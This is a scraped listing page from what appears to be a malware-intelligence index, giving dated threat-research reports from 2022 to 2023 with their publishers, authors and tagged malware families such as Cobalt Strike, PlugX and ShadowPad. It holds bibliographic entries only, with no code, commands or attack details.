×Select Content2023-08-30
⋅
Trend Micro
⋅
Gilbert Sison,
Hara Hiroaki,
Lenart Bermejo,
Leon M Chang,
Ted LeeEarth Estries Targets Government, Tech for Cyberespionage Cobalt Strike
HemiGate
Earth Estries
×Select Content2023-08-28
⋅
The DFIR Report
⋅
The DFIR ReportHTML Smuggling Leads to Domain Wide Ransomware Cobalt Strike
IcedID
Nokoyawa Ransomware
×Select Content2023-08-22
⋅
Symantec
⋅
Threat Hunter TeamCarderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong PlugX
Carderbee
×Select Content2023-08-18
⋅
TEAMT5
⋅
Still Hsu,
Zih-Cing LiaoUnmasking CamoFei: An In-depth Analysis of an Emerging APT Group Focused on Healthcare Sectors in East Asia CatB
Cobalt Strike
DoorMe
GIMMICK
×Select Content2023-08-18
⋅
d01a
⋅
Mohamed AdelUnderstanding Syscalls: Direct, Indirect, and Cobalt Strike Implementation Cobalt Strike
×Select Content2023-08-17
⋅
SentinelOne
⋅
Aleksandar Milenkoski,
Tom HegelChinese Entanglement | DLL Hijacking in the Asian Gambling Sector Cobalt Strike
HUI Loader
BRONZE STARLIGHT
×Select Content2023-08-07
⋅
Recorded Future
⋅
Insikt GroupRedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale Winnti
Brute Ratel C4
Cobalt Strike
FunnySwitch
PlugX
ShadowPad
Spyder
Earth Lusca
×Select Content2023-07-29
⋅
⋅
Google Cybersecurity Action TeamThreat Horizons August 2023 Threat Horizons Report SharkBot
Cobalt Strike
×Select Content2023-07-19
⋅
Lookout
⋅
Justin Albrecht,
Kristina BalaamLookout Attributes Advanced Android Surveillanceware to Chinese Espionage Group APT41 DragonEgg
WyrmSpy
×Select Content2023-07-14
⋅
Trend Micro
⋅
Daniel LunghiPossible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad ShadowPad
DriftingCloud
Tonto Team
×Select Content2023-07-11
⋅
Spamhaus
⋅
Spamhaus Malware LabsSpamhaus Botnet Threat Update Q2 2023 Hydra
AsyncRAT
Aurora Stealer
Ave Maria
BumbleBee
Cobalt Strike
DCRat
Havoc
IcedID
ISFB
NjRAT
QakBot
Quasar RAT
RecordBreaker
RedLine Stealer
Remcos
Rhadamanthys
Sliver
Tofsee
×Select Content2023-07-11
⋅
Mandiant
⋅
Ng Choon Kiat,
Rommel JovenThe Spies Who Loved You: Infected USB Drives to Steal Secrets PlugX
×Select Content2023-07-07
⋅
Lab52
⋅
Lab52Beyond appearances: unknown actor using APT29’s TTP against Chinese users Cobalt Strike
×Select Content2023-07-03
⋅
Check Point Research
⋅
Checkpoint ResearchChinese Threat Actors Targeting Europe in SmugX Campaign PlugX
SmugX
×Select Content2023-06-30
⋅
K7 Security
⋅
DhanushCobalt Strike’s Deployment with Hardware Breakpoint for AMSI Bypass Cobalt Strike
×Select Content2023-06-16
⋅
Palo Alto Networks: Cortex Threat Research
⋅
Lior RochbergerThrough the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa CHINACHOPPER
Ladon
Yasso
CL-STA-0043
×Select Content2023-06-15
⋅
eSentire
⋅
RussianPandaeSentire Threat Intelligence Malware Analysis: Resident Campaign Cobalt Strike
Rhadamanthys
×Select Content2023-06-08
⋅
Twitter (@embee_research)
⋅
Embee_researchPractical Queries for Identifying Malware Infrastructure: An informal page for storing Censys/Shodan queries Amadey
AsyncRAT
Cobalt Strike
QakBot
Quasar RAT
Sliver
solarmarker
×Select Content2023-06-08
⋅
VMRay
⋅
Patrick StaubmannBusy Bees - The Transformation of BumbleBee BumbleBee
Cobalt Strike
Conti
Meterpreter
Sliver
×Select Content2023-05-15
⋅
Symantec
⋅
Threat Hunter TeamLancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors Merdoor
PlugX
ShadowPad
ZXShell
Lancefly
×Select Content2023-05-11
⋅
cocomelonc
⋅
cocomeloncMalware development trick - part 28: Dump lsass.exe. Simple C++ example. Cobalt Strike
APT3 Keylogger
×Select Content2023-05-03
⋅
Lab52
⋅
Lab52New Mustang Panda’s campaing against Australia PlugX
×Select Content2023-04-20
⋅
Github (dodo-sec)
⋅
dodo-secAn analysis of syscall usage in Cobalt Strike Beacons Cobalt Strike
×Select Content2023-04-20
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamBumblebee Malware Distributed Via Trojanized Installer Downloads BumbleBee
Cobalt Strike
×Select Content2023-04-18
⋅
Mandiant
⋅
MandiantM-Trends 2023 QUIETEXIT
AppleJeus
Black Basta
BlackCat
CaddyWiper
Cobalt Strike
Dharma
HermeticWiper
Hive
INDUSTROYER2
Ladon
LockBit
Meterpreter
PartyTicket
PlugX
QakBot
REvil
Royal Ransom
SystemBC
WhisperGate
×Select Content2023-04-12
⋅
Spamhaus
⋅
Spamhaus Malware LabsSpamhaus Botnet Threat Update Q1 2023 FluBot
Amadey
AsyncRAT
Aurora
Ave Maria
BumbleBee
Cobalt Strike
DCRat
Emotet
IcedID
ISFB
NjRAT
QakBot
RecordBreaker
RedLine Stealer
Remcos
Rhadamanthys
Sliver
Tofsee
Vidar
×Select Content2023-04-03
⋅
The DFIR Report
⋅
The DFIR ReportMalicious ISO File Leads to Domain Wide Ransomware Cobalt Strike
IcedID
Mount Locker
×Select Content2023-03-30
⋅
United States District Court (Eastern District of New York)
⋅
Fortra,
HEALTH-ISAC,
MicrosoftCracked Cobalt Strike (1:23-cv-02447) Black Basta
BlackCat
LockBit
RagnarLocker
LockBit
Black Basta
BlackCat
Cobalt Strike
Cuba
Emotet
LockBit
Mount Locker
PLAY
QakBot
RagnarLocker
Royal Ransom
Zloader
×Select Content2023-03-30
⋅
Recorded Future
⋅
Insikt GroupWith KEYPLUG, China’s RedGolf Spies On, Steals From Wide Field of Targets KEYPLUG
Cobalt Strike
PlugX
RedGolf
×Select Content2023-03-30
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)eSentire Threat Intelligence Malware Analysis: BatLoader BATLOADER
Cobalt Strike
ISFB
SystemBC
Vidar
×Select Content2023-03-28
⋅
ExaTrack
⋅
ExaTrackMélofée: a new alien malware in the Panda's toolset targeting Linux hosts HelloBot
Melofee
Winnti
Cobalt Strike
SparkRAT
STOWAWAY
×Select Content2023-03-27
⋅
⋅
Google Cybersecurity Action TeamThreat Horizons: April 2023 Threat Horizons Report Gdrive
APT41
×Select Content2023-03-10
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattFrom Royal With Love Cobalt Strike
Conti
PLAY
Royal Ransom
Somnia
×Select Content2023-03-09
⋅
ASEC
⋅
SanseoPlugX Malware Being Distributed via Vulnerability Exploitation PlugX
×Select Content2023-03-09
⋅
Sophos
⋅
Gabor SzappanosA border-hopping PlugX USB worm takes its act on the road PlugX
×Select Content2023-03-01
⋅
Zscaler
⋅
Meghraj Nandanwar,
Shatak JainOneNote: A Growing Threat for Malware Distribution AsyncRAT
Cobalt Strike
IcedID
QakBot
RedLine Stealer
×Select Content2023-02-24
⋅
Trend Micro
⋅
Buddy Tancio,
Catherine Loveria,
Jed ValderamaInvestigating the PlugX Trojan Disguised as a Legitimate Windows Debugger Tool PlugX
×Select Content2023-02-23
⋅
Bitdefender
⋅
Bitdefender Team,
Martin ZugecTechnical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966 Cobalt Strike
DarkComet
QuiteRAT
RATel
×Select Content2023-02-22
⋅
Symantec
⋅
Symantec Threat Hunter TeamHydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia Cobalt Strike
×Select Content2023-02-14
⋅
Cybereason
⋅
Cybereason Incident Response (IR) teamGootLoader - SEO Poisoning and Large Payloads Leading to Compromise GootLoader
Cobalt Strike
SystemBC
×Select Content2023-02-13
⋅
AhnLab
⋅
kingkimgimDalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign Godzilla Webshell
ASPXSpy
BlueShell
CHINACHOPPER
Cobalt Strike
Ladon
MimiKatz
Dalbit
×Select Content2023-02-13
⋅
Kroll
⋅
Laurie Iacono,
Stephen GreenRoyal Ransomware Deep Dive Cobalt Strike
Royal Ransom
×Select Content2023-02-08
⋅
Trend Micro
⋅
Ted LeeEarth Zhulong: Familiar Patterns Target Southeast Asian Firms Cobalt Strike
MACAMAX
1937CN
×Select Content2023-02-03
⋅
Mandiant
⋅
Genevieve Stark,
Kimberly GoodyFloat Like a Butterfly Sting Like a Bee BazarBackdoor
BumbleBee
Cobalt Strike
×Select Content2023-02-02
⋅
Kroll
⋅
Elio Biasiotto,
Stephen GreenHive Ransomware Technical Analysis and Initial Access Discovery BATLOADER
Cobalt Strike
Hive
×Select Content2023-02-02
⋅
Elastic
⋅
Andrew Pease,
Cyril François,
Devon Kerr,
Remco Sprooten,
Salim Bitam,
Seth GoodwinUpdate to the REF2924 intrusion set and related campaigns DoorMe
ShadowPad
SiestaGraph
×Select Content2023-02-02
⋅
EclecticIQ
⋅
EclecticIQ Threat Research TeamMustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware PlugX
×Select Content2023-01-30
⋅
Checkpoint
⋅
Arie OlshteinFollowing the Scent of TrickGate: 6-Year-Old Packer Used to Deploy the Most Wanted Malware Agent Tesla
Azorult
Buer
Cerber
Cobalt Strike
Emotet
Formbook
HawkEye Keylogger
Loki Password Stealer (PWS)
Maze
NetWire RC
Remcos
REvil
TrickBot
×Select Content2023-01-26
⋅
TEAMT5
⋅
Still HsuBrief History of MustangPanda and its PlugX Evolution PlugX
×Select Content2023-01-26
⋅
Palo Alto Networks Unit 42
⋅
Jen Miller-Osborn,
Mike HarbisonChinese PlugX Malware Hidden in Your USB Devices? PlugX
×Select Content2023-01-24
⋅
Fortinet
⋅
Geri RevayThe Year of the Wiper Azov Wiper
Bruh Wiper
CaddyWiper
Cobalt Strike
Vidar
×Select Content2023-01-23
⋅
Kroll
⋅
Elio Biasiotto,
Stephen GreenBlack Basta – Technical Analysis Black Basta
Cobalt Strike
MimiKatz
QakBot
SystemBC
×Select Content2023-01-16
⋅
Intrinsec
⋅
IntrinsecProxyNotShell – OWASSRF – Merry Xchange Cobalt Strike
SystemBC
×Select Content2023-01-09
⋅
kienmanowar Blog
⋅
m4n0w4r,
Tran Trung Kien[QuickNote] Another nice PlugX sample PlugX
×Select Content2023-01-05
⋅
Symantec
⋅
Threat Hunter TeamBluebottle: Campaign Hits Banks in French-speaking Countries in Africa CloudEyE
Cobalt Strike
MimiKatz
NetWire RC
POORTRY
Quasar RAT
BlueBottle
×Select Content2022-12-27
⋅
kienmanowar Blog
⋅
m4n0w4r,
Tran Trung KienDiving into a PlugX sample of Mustang Panda group PlugX
×Select Content2022-12-22
⋅
Recorded Future
⋅
Insikt GroupRedDelta Targets European Government Organizations and Continues to Iterate Custom PlugX Variant PlugX
RedDelta
×Select Content2022-12-15
⋅
Mandiant
⋅
MandiantTrojanized Windows 10 Operating System Installers Targeted Ukrainian Government Cobalt Strike
STOWAWAY
×Select Content2022-12-08
⋅
Cisco Talos
⋅
Tiago PereiraBreaking the silence - Recent Truebot activity Clop
Cobalt Strike
FlawedGrace
Raspberry Robin
Silence
Teleport
×Select Content2022-12-06
⋅
EuRepoC
⋅
Camille Borrett,
Kerstin Zettl-Schabath,
Lena RottingerConti/Wizard Spider BazarBackdoor
Cobalt Strike
Conti
Emotet
IcedID
Ryuk
TrickBot
WIZARD SPIDER
×Select Content2022-12-06
⋅
Blackberry
⋅
BlackBerry Research & Intelligence TeamMustang Panda Uses the Russian-Ukrainian War to Attack Europe and Asia Pacific Targets PlugX
×Select Content2022-12-02
⋅
Palo Alto Networks Unit 42
⋅
Bob Jung,
Dominik Reichel,
Esmid IdrizovicBlowing Cobalt Strike Out of the Water With Memory Analysis Cobalt Strike
×Select Content2022-12-02
⋅
Avast Decoded
⋅
Threat Intelligence TeamHitching a ride with Mustang Panda PlugX
×Select Content2022-11-30
⋅
⋅
FFRI Security
⋅
MatsumotoEvolution of the PlugX loader PlugX
Poison Ivy
×Select Content2022-11-15
⋅
SOC Prime
⋅
Veronika TelychkoSomnia Malware Detection: UAC-0118 aka FRwL Launches Cyber Attacks Against Organizations in Ukraine Using Enhanced Malware Strains Cobalt Strike
Vidar
UAC-0118
×Select Content2022-11-09
⋅
Trend Micro
⋅
Hara Hiroaki,
Ted LeeHack the Real Box: APT41’s New Subgroup Earth Longzhi Cobalt Strike
MimiKatz
Earth Longzhi
×Select Content2022-11-03
⋅
paloalto Netoworks: Unit42
⋅
Chris Navarrete,
Durgesh Sangvikar,
Matthew Tennis,
Siddhart Shibiraj,
Yanhui Jia,
Yu FuCobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild Cobalt Strike
×Select Content2022-11-03
⋅
Group-IB
⋅
Rustam MirkasymovFinancially motivated, dangerously activated: OPERA1ER APT in Africa Cobalt Strike
Common Raven
×Select Content2022-11-03
⋅
Github (chronicle)
⋅
ChronicleGCTI Open Source Detection Signatures Cobalt Strike
Sliver
×Select Content2022-10-31
⋅
Cynet
⋅
Max MalyutinOrion Threat Alert: Qakbot TTPs Arsenal and the Black Basta Ransomware Black Basta
Cobalt Strike
QakBot
×Select Content2022-10-25
⋅
VMware Threat Analysis Unit
⋅
Takahiro HaruyamaTracking the entire iceberg: long-term APT malware C2 protocol emulation and scanning ShadowPad
Winnti
×Select Content2022-10-13
⋅
Spamhaus
⋅
Spamhaus Malware LabsSpamhaus Botnet Threat Update Q3 2022 FluBot
Arkei Stealer
AsyncRAT
Ave Maria
BumbleBee
Cobalt Strike
DCRat
Dridex
Emotet
Loki Password Stealer (PWS)
Nanocore RAT
NetWire RC
NjRAT
QakBot
RecordBreaker
RedLine Stealer
Remcos
Socelars
Tofsee
Vjw0rm
×Select Content2022-10-13
⋅
Microsoft
⋅
Microsoft Threat Hunting,
MSRC TeamHunting for Cobalt Strike: Mining and plotting for fun and profit Cobalt Strike
×Select Content2022-10-12
⋅
Trend Micro
⋅
Ian Kenefick,
Lucas Silva,
Nicole HernandezBlack Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Black Basta
Brute Ratel C4
Cobalt Strike
QakBot
×Select Content2022-10-06
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamMustang Panda Abuses Legitimate Apps to Target Myanmar Based Victims PlugX
×Select Content2022-10-03
⋅
Check Point
⋅
Marc Salinas FernandezBumblebee: increasing its capacity and evolving its TTPs BumbleBee
Cobalt Strike
Meterpreter
Sliver
Vidar
×Select Content2022-10-03
⋅
Trend Micro
⋅
Jaromír Hořejší,
Joseph ChenWater Labbu Abuses Malicious DApps to Steal Cryptocurrency Cobalt Strike
Water Labbu
×Select Content2022-09-30
⋅
NCC Group
⋅
Michael Mullen,
Nikolaos Pantazopoulos,
William BackhouseA glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion ShadowPad
×Select Content2022-09-29
⋅
Symantec
⋅
Threat Hunter TeamWitchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East CHINACHOPPER
Lookback
MimiKatz
PlugX
Unidentified 096 (Keylogger)
x4
Witchetty
×Select Content2022-09-26
⋅
Palo Alto Networks Unit 42
⋅
Daniela Shalev,
Itay GamlielHunting for Unsigned DLLs to Find APTs PlugX
Raspberry Robin
Roshtyak
×Select Content2022-09-26
⋅
The DFIR Report
⋅
The DFIR ReportBumbleBee: Round Two BumbleBee
Cobalt Strike
Meterpreter
×Select Content2022-09-25
⋅
YouTube (Arda Büyükkaya)
⋅
Arda BüyükkayaCobalt Strike Shellcode Loader With Rust (YouTube) Cobalt Strike
×Select Content2022-09-19
⋅
Virus Bulletin
⋅
Takahiro HaruyamaTracking the entire iceberg - long-term APT malware C2 protocol emulation and scanning ShadowPad
Winnti
×Select Content2022-09-14
⋅
Security Joes
⋅
Felipe DuarteDissecting PlugX to Extract Its Crown Jewels PlugX
×Select Content2022-09-13
⋅
Symantec
⋅
Threat Hunter TeamNew Wave of Espionage Activity Targets Asian Governments MimiKatz
PlugX
Quasar RAT
ShadowPad
Trochilus RAT
×Select Content2022-09-13
⋅
AdvIntel
⋅
Advanced IntelligenceAdvIntel's State of Emotet aka "SpmTools" Displays Over Million Compromised Machines Through 2022 Conti
Cobalt Strike
Emotet
Ryuk
TrickBot
×Select Content2022-09-12
⋅
The DFIR Report
⋅
The DFIR ReportDead or Alive? An Emotet Story Cobalt Strike
Emotet
×Select Content2022-09-09
⋅
Github (m4now4r)
⋅
m4n0w4r“Mustang Panda” – Enemy at the gate PlugX
×Select Content2022-09-08
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamBRONZE PRESIDENT Targets Government Officials PlugX
×Select Content2022-09-08
⋅
Cybereason
⋅
Aleksandar Milenkoski,
Kotaro Ogino,
Yuki ShibuyaThreat Analysis Report: PlugX RAT Loader Evolution PlugX
×Select Content2022-09-07
⋅
⋅
Google Threat Analysis Group,
Pierre-Marc BureauInitial access broker repurposing techniques in targeted attacks against Ukraine AnchorMail
Cobalt Strike
IcedID
×Select Content2022-09-07
⋅
cyble
⋅
CybleBumblebee Returns With New Infection Technique BumbleBee
Cobalt Strike
×Select Content2022-09-06
⋅
ESET Research
⋅
Thibaut PassillyWorok: The big picture MimiKatz
PNGLoad
reGeorg
ShadowPad
Worok
×Select Content2022-09-06
⋅
⋅
INCIBE-CERT
⋅
INCIBEEstudio del análisis de Nobelium BEATDROP
BOOMBOX
Cobalt Strike
EnvyScout
Unidentified 099 (APT29 Dropbox Loader)
VaporRage
×Select Content2022-09-06
⋅
CISA
⋅
CISA,
FBI,
MS-ISAC,
US-CERTAlert (AA22-249A) #StopRansomware: Vice Society Cobalt Strike
Empire Downloader
FiveHands
HelloKitty
SystemBC
Zeppelin
×Select Content2022-09-06
⋅
Didier Stevens
⋅
Didier StevensAn Obfuscated Beacon – Extra XOR Layer Cobalt Strike
×Select Content2022-09-06
⋅
cocomelonc
⋅
cocomeloncMalware development tricks: parent PID spoofing. Simple C++ example. Cobalt Strike
Konni
×Select Content2022-09-01
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraHunting C2/Adversaries Infrastructure with Shodan and Censys Brute Ratel C4
Cobalt Strike
Deimos
GRUNT
IcedID
Merlin
Meterpreter
Nighthawk
PoshC2
Sliver
×Select Content2022-09-01
⋅
Trend Micro
⋅
Trend MicroRansomware Spotlight Black Basta Black Basta
Cobalt Strike
MimiKatz
QakBot
×Select Content2022-08-30
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)Hacker Infrastructure Used in Cisco Breach Discovered Attacking a Top Workforce Management Corporation & an Affiliate of Russia’s Evil Corp Gang Suspected, Reports eSentire Cobalt Strike
FiveHands
UNC2447
×Select Content2022-08-25
⋅
SentinelOne
⋅
Jim WalterBlueSky Ransomware | AD Lateral Movement, Evasion and Fast Encryption Put Threat on the Radar BlueSky
Cobalt Strike
JuicyPotato
×Select Content2022-08-22
⋅
Microsoft
⋅
MicrosoftExtortion Economics - Ransomware’s new business model BlackCat
Conti
Hive
REvil
AgendaCrypt
Black Basta
BlackCat
Brute Ratel C4
Cobalt Strike
Conti
Hive
Mount Locker
Nokoyawa Ransomware
REvil
Ryuk
×Select Content2022-08-19
⋅
nccgroup
⋅
Ross InmanBack in Black: Unlocking a LockBit 3.0 Ransomware Attack FAKEUPDATES
Cobalt Strike
LockBit
×Select Content2022-08-18
⋅
⋅
NSFOCUS
⋅
NSFOCUSNew APT group MURENSHARK investigative report: Torpedoes hit Turkish Navy Cobalt Strike
×Select Content2022-08-18
⋅
Group-IB
⋅
Nikita RostovtsevAPT41 World Tour 2021 on a tight schedule Cobalt Strike
×Select Content2022-08-18
⋅
Sophos
⋅
Sean GallagherCookie stealing: the new perimeter bypass Cobalt Strike
Meterpreter
MimiKatz
Phoenix Keylogger
Quasar RAT
×Select Content2022-08-18
⋅
Trustwave
⋅
Pawel KnapczykOverview of the Cyber Weapons Used in the Ukraine - Russia War AcidRain
CaddyWiper
Cobalt Strike
CredoMap
DCRat
DoubleZero
GraphSteel
GrimPlant
HermeticWiper
INDUSTROYER2
InvisiMole
IsaacWiper
PartyTicket
×Select Content2022-08-18
⋅
Trustwave
⋅
Pawel KnapczykOverview of the Cyber Weapons Used in the Ukraine - Russia War AcidRain
CaddyWiper
Cobalt Strike
CredoMap
DCRat
DoubleZero
GraphSteel
GrimPlant
HermeticWiper
INDUSTROYER2
InvisiMole
IsaacWiper
PartyTicket
×Select Content2022-08-17
⋅
Cybereason
⋅
Cybereason Global SOC TeamBumblebee Loader – The High Road to Enterprise Domain Control BumbleBee
Cobalt Strike
×Select Content2022-08-17
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamDarkTortilla Malware Analysis Agent Tesla
AsyncRAT
Cobalt Strike
DarkTortilla
Nanocore RAT
RedLine Stealer
×Select Content2022-08-12
⋅
SANS ISC
⋅
Brad DuncanMonster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC and Cobalt Strike Cobalt Strike
DarkVNC
IcedID
×Select Content2022-08-11
⋅
Malcat
⋅
malcat teamLNK forensic and config extraction of a cobalt strike beacon Cobalt Strike
×Select Content2022-08-11
⋅
SecurityScorecard
⋅
Robert AmesThe Increase in Ransomware Attacks on Local Governments BlackCat
BlackCat
Cobalt Strike
LockBit
×Select Content2022-08-10
⋅
⋅
Weixin
⋅
Red Raindrop TeamOperation(верность) mercenary: a torrent of steel trapped in the plains of Eastern Europe BumbleBee
Cobalt Strike
×Select Content2022-08-08
⋅
The DFIR Report
⋅
The DFIR ReportBumbleBee Roasts Its Way to Domain Admin BumbleBee
Cobalt Strike
×Select Content2022-08-04
⋅
YouTube (Arda Büyükkaya)
⋅
Arda BüyükkayaLockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool Cobalt Strike
LockBit
×Select Content2022-08-03
⋅
Palo Alto Networks Unit 42
⋅
Brad DuncanFlight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware BazarBackdoor
BumbleBee
Cobalt Strike
Conti
×Select Content2022-08-02
⋅
Cisco Talos
⋅
Asheer Malhotra,
Vitor VenturaManjusaka: A Chinese sibling of Sliver and Cobalt Strike Manjusaka
Cobalt Strike
Manjusaka
×Select Content2022-07-30
⋅
cocomeloncMalware AV evasion - part 8. Encode payload via Z85 Agent Tesla
Carbanak
Carberp
Cardinal RAT
Cobalt Strike
donut_injector
×Select Content2022-07-28
⋅
SentinelOne
⋅
James Haughom,
Julien Reisdorffer,
Júlio DantasLiving Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool Cobalt Strike
LockBit
×Select Content2022-07-27
⋅
ReversingLabs
⋅
Joseph EdwardsThreat analysis: Follina exploit fuels 'live-off-the-land' attacks Cobalt Strike
MimiKatz
×Select Content2022-07-27
⋅
cyble
⋅
Cyble Research LabsTargeted Attacks Being Carried Out Via DLL SideLoading Cobalt Strike
QakBot
×Select Content2022-07-27
⋅
Trend Micro
⋅
Buddy Tancio,
Jed ValderamaGootkit Loader’s Updated Tactics and Fileless Delivery of Cobalt Strike Cobalt Strike
GootKit
Kronos
REvil
SunCrypt
×Select Content2022-07-26
⋅
Microsoft
⋅
Microsoft 365 Defender Research TeamMalicious IIS extensions quietly open persistent backdoors into servers CHINACHOPPER
MimiKatz
×Select Content2022-07-22
⋅
Binary Ninja
⋅
Xusheng LiReverse Engineering a Cobalt Strike Dropper With Binary Ninja Cobalt Strike
×Select Content2022-07-20
⋅
NVISO Labs
⋅
Sasja ReynaertAnalysis of a trojanized jQuery script: GootLoader unleashed GootLoader
Cobalt Strike
×Select Content2022-07-20
⋅
U.S. Cyber Command
⋅
Cyber National Mission Force Public AffairsCyber National Mission Force discloses IOCs from Ukrainian networks Cobalt Strike
GraphSteel
GrimPlant
MicroBackdoor
×Select Content2022-07-20
⋅
Advanced Intelligence
⋅
Marley Smith,
Vitali Kremez,
Yelisey BoguslavskiyAnatomy of Attack: Truth Behind the Costa Rica Government Ransomware 5-Day Intrusion Cobalt Strike
×Select Content2022-07-20
⋅
Mandiant
⋅
Mandiant Threat IntelligenceEvacuation and Humanitarian Documents used to Spear Phish Ukrainian Entities Cobalt Strike
GraphSteel
GrimPlant
MicroBackdoor
×Select Content2022-07-19
⋅
Palo Alto Networks Unit 42
⋅
Mike Harbison,
Peter RenalsRussian APT29 Hackers Use Online Storage Services, DropBox and Google Drive Cobalt Strike
EnvyScout
Gdrive
×Select Content2022-07-18
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Obscure Serpens Cobalt Strike
Empire Downloader
Meterpreter
MimiKatz
DarkHydrus
×Select Content2022-07-18
⋅
YouTube (Security Joes)
⋅
Felipe DuartePlugX DLL Side-Loading Technique PlugX
×Select Content2022-07-18
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Shallow Taurus FormerFirstRAT
IsSpace
NewCT
PlugX
Poison Ivy
Tidepool
DragonOK
×Select Content2022-07-18
⋅
Censys
⋅
CensysRussian Ransomware C2 Network Discovered in Censys Data Cobalt Strike
DeimosC2
MimiKatz
PoshC2
×Select Content2022-07-18
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Iron Taurus CHINACHOPPER
Ghost RAT
Wonknu
ZXShell
APT27
×Select Content2022-07-13
⋅
Malwarebytes Labs
⋅
Hossein Jazi,
Roberto SantosCobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign Cobalt Strike
×Select Content2022-07-13
⋅
Palo Alto Networks Unit 42
⋅
Chris Navarrete,
Durgesh Sangvikar,
Siddhart Shibiraj,
Yanhui Jia,
Yu FuCobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption Cobalt Strike
×Select Content2022-07-11
⋅
⋅
Cert-UA
⋅
Cert-UAUAC-0056 attack on Ukrainian state organizations using Cobalt Strike Beacon (CERT-UA#4941) Cobalt Strike
×Select Content2022-07-07
⋅
SANS ISC
⋅
Brad DuncanEmotet infection with Cobalt Strike Cobalt Strike
Emotet
×Select Content2022-07-07
⋅
IBM
⋅
Charlotte Hammond,
Kat Weinberger,
Ole VilladsenUnprecedented Shift: The Trickbot Group is Systematically Attacking Ukraine AnchorMail
BumbleBee
Cobalt Strike
IcedID
Meterpreter
×Select Content2022-07-06
⋅
⋅
Cert-UA
⋅
Cert-UAUAC-0056 cyberattack on Ukrainian state organizations using Cobalt Strike Beacon (CERT-UA#4914) Cobalt Strike
×Select Content2022-07-01
⋅
RiskIQ
⋅
RiskIQToddyCat: A Guided Journey through the Attacker's Infrastructure ShadowPad
ToddyCat
×Select Content2022-06-30
⋅
Trend Micro
⋅
Emmanuel Panopio,
James Panlilio,
John Kenneth Reyes,
Kenneth Adrian Apostol,
Melvin Singwa,
Mirah Manlapig,
Paolo Ronniel LabradorBlack Basta Ransomware Operators Expand Their Attack Arsenal With QakBot Trojan and PrintNightmare Exploit Black Basta
Cobalt Strike
QakBot
×Select Content2022-06-28
⋅
Lumen
⋅
Black Lotus LabsZuoRAT Hijacks SOHO Routers To Silently Stalk Networks ZuoRAT
Cobalt Strike
×Select Content2022-06-27
⋅
Kaspersky ICS CERT
⋅
Artem Snegirev,
Kirill KruglovAttacks on industrial control systems using ShadowPad Cobalt Strike
PlugX
ShadowPad
×Select Content2022-06-26
⋅
BushidoTokenOverview of Russian GRU and SVR Cyberespionage Campaigns 1H 2022 Cobalt Strike
CredoMap
EnvyScout
×Select Content2022-06-23
⋅
cyble
⋅
Cyble Research LabsMatanbuchus Loader Resurfaces Cobalt Strike
Matanbuchus
×Select Content2022-06-23
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamBRONZE STARLIGHT Ransomware Operations Use HUI Loader ATOMSILO
Cobalt Strike
HUI Loader
LockFile
NightSky
Pandora
PlugX
Quasar RAT
Rook
SodaMaster
BRONZE STARLIGHT
×Select Content2022-06-21
⋅
Cisco Talos
⋅
Chris Neal,
Flavio Costa,
Guilherme VenereAvos ransomware group expands with new attack arsenal AvosLocker
Cobalt Strike
DarkComet
MimiKatz
×Select Content2022-06-20
⋅
⋅
Cert-UA
⋅
Cert-UAUAC-0098 group cyberattack on critical infrastructure of Ukraine (CERT-UA#4842) Cobalt Strike
×Select Content2022-06-17
⋅
SANS ISC
⋅
Brad DuncanMalspam pushes Matanbuchus malware, leads to Cobalt Strike Cobalt Strike
Matanbuchus
×Select Content2022-06-15
⋅
Security Joes
⋅
Charles Lomboni,
Felipe Duarte,
Venkat RajgorBackdoor via XFF: Mysterious Threat Actor Under Radar CHINACHOPPER
×Select Content2022-06-11
⋅
Twitter (@MsftSecIntel)
⋅
Microsoft Threat IntelligenceTweet on DEV-0401, DEV-0234 exploiting Confluence RCE CVE-2022-26134 Kinsing
Mirai
Cobalt Strike
×Select Content2022-06-07
⋅
AdvIntel
⋅
Marley Smith,
Vitali Kremez,
Yelisey BoguslavskiyBlackCat — In a Shifting Threat Landscape, It Helps to Land on Your Feet: Tech Dive BlackCat
BlackCat
Cobalt Strike
×Select Content2022-06-07
⋅
cyble
⋅
CybleBumblebee Loader on The Rise BumbleBee
Cobalt Strike
×Select Content2022-06-06
⋅
Trellix
⋅
TrelixGrowling Bears Make Thunderous Noise Cobalt Strike
HermeticWiper
WhisperGate
NB65
×Select Content2022-06-04
⋅
kienmanowar Blog
⋅
m4n0w4r,
Tran Trung Kien[QuickNote] CobaltStrike SMB Beacon Analysis Cobalt Strike
×Select Content2022-06-03
⋅
AttackIQ
⋅
AttackIQ Adversary Research Team,
Jackson WellsAttack Graph Response to US CERT AA22-152A: Karakurt Data Extortion Group Cobalt Strike
MimiKatz
×Select Content2022-06-02
⋅
Mandiant
⋅
MandiantTRENDING EVIL Q2 2022 CloudEyE
Cobalt Strike
CryptBot
Emotet
IsaacWiper
